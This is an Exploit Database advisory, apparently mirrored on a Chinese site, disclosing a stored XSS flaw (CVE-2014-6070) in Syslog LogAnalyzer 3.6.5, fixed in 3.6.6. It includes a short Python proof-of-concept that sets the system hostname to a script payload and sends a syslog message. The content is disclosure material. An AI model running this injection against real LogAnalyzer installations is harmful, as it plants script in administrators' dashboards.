Syslog LogAnalyzer 3.6.5 – Persistent Cross-Site Scripting

• Exploit Database
• 110 阅读

• 作者： Dolev Farhi
  日期： 2014-09-02
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/34525/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52

  Vulnerability title: Syslog LogAnalyzer 3.6.5 Stored XSS Author: Dolev Farhi Contact: dolevf at yahoo dot com@dolevff Application: LogAnalyzer 3.6.5 Date: 8.2.2014 Relevant CVEs: CVE-2014-6070 Vulnerable version: <= 3.6.5 Fixed version: 3.6.6   1. About the application ------------------------ LogAnalyzer is a web interface to syslog and other network event data. It provides easy browsing, analysis of realtime network events and reporting services.     2. Vulnerabilities Descriptions: ----------------------------- It was found that an XSS injection is possible on a syslog server running LogAnalyzer version 3.6.5. by changing the hostname of any entity logging to syslog server with LogAnalyzer to <script>alert("xss")</script>, and sending an arbitrary syslog message, a client-side script injection execution is possible.     4. proof of concept exploit ----------------------- #!/usr/bin/python # Exploit title = LogAnalyzer 3.5.6 Stored XSS injection # Date: Sept 2014 # CVE: 2014-6070 # Tested on RHEL6.4   import os import syslog   hostname = os.uname()[1] payload = "\"<script>alert(&apos;XSS&apos;);</script>\""   print("+ Setting temporary hostname to " + payload + "...") os.system("hostname " +payload)   print("+ Injecting the syslog message...") syslog.syslog("syslog xss injection")   print("+ Check LogAnalyzer dashboard...")   raw_input("+ Press [enter] to restore hostname...") os.system("hostname " + "\""+hostname + "\"")   print("+ Hostname restored to " + hostname)